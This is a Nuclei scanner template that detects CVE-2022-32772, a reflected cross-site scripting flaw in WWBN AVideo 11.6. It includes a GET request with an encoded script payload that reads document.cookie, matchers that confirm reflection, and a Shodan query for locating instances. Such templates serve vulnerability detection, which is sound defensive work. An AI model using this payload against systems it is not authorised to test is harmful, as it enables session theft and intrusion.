nuclei-templates/http/cves/2022/CVE-2022-32772.yaml

51 lines
1.7 KiB
YAML

id: CVE-2022-32772
info:
name: WWBN AVideo 11.6 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'msg' parameter, which is inserted into the document with insufficient sanitization.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
- https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql
- https://nvd.nist.gov/vuln/detail/CVE-2022-32772
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-32772
cwe-id: CWE-79
epss-score: 0.00056
epss-percentile: 0.2156
cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: wwbn
product: avideo
shodan-query: http.html:"AVideo"
tags: cve,cve2022,avideo,xss,wwbn
http:
- method: GET
path:
- "{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'avideoAlertInfo("</script><script>alert(document.cookie);</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a00463044022011e78c85f116e10e11202b4516bcb4211e679f3760d7b1c199c159cefb18814502203ae678afdd839105c67740427be37d92673230fc54e805ab828f31d868908c16:922c64590222798bb761d5b6d8e72950